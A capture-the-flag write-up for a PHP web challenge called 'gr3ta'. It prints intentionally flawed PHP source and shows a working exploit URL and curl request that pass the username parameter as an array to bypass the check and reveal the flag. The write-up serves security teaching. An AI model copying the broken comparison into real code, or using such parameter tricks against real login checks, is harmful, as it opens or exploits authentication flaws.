# SYberCTF – gr3ta

* **Category:** web
* **Points:** 100 points

## Challenge
There is a feature in php that is making gr3ta very unhappy. can you find that feature and use it to get the flag?

>link: http://94.141.219.18:8001/

>author: t0mcr8se

## Solution
We can see in the HTML source ```<!-- <a href="/sauce.txt">sauce</a> -->```, we open it to find the source code of index.php in [sauce.txt](./sauce.txt)

```
        $name = $_GET["username"];
		$secret = "gr3ta";
		if($name === $secret)
			echo("not so easy <br><br> <img src='fail.jpg'>");
		else{
			if(count($name) == 5){
				for($i = 0 ; $i <5 ; $i++){
					if($name[i] !== $secret[i]){
						echo("secret name doesn't match <br><br> <img src='fail.jpg'>");
						break;
					}
				}
				exit( "flag{REDACTED} <br><br><img src='success.jpg'>");
			}
			else
				echo("secret name doesn't match <br><br> <img src='fail.jpg'>");
		}
```
what the code basically says: `$_GET["username"]` needs to be `gr3ta` but at the same time not `gr3ta`.

As you can see this challenge was poorly written so there were some unintended solutions.

But the intended solution was to pass the `$secret` as an array of single charachters in get parameter like this:

```http://94.141.219.18:8001/?username[]=g&username[]=r&username[]=3&username[]=t&username[]=a```


this would basically give us something like ['g' , 'r' , '3' , 't' , 'a'] in `$_GET['username']` and it would pass the for loop succesfully.

so if we try it:
```
$ curl "http://94.141.219.18:8001/?username[]=g&username[]=r&username[]=3&username[]=t&username[]=a"
secret name doesn't match <br><br> <img src='fail.jpg'>flag{Param3t3r_P0llution_n0t_b4d} <br><br><img src='success.jpg'>
```

```flag{Param3t3r_P0llution_n0t_b4d}```

>I'm not proud about writing this one 3:

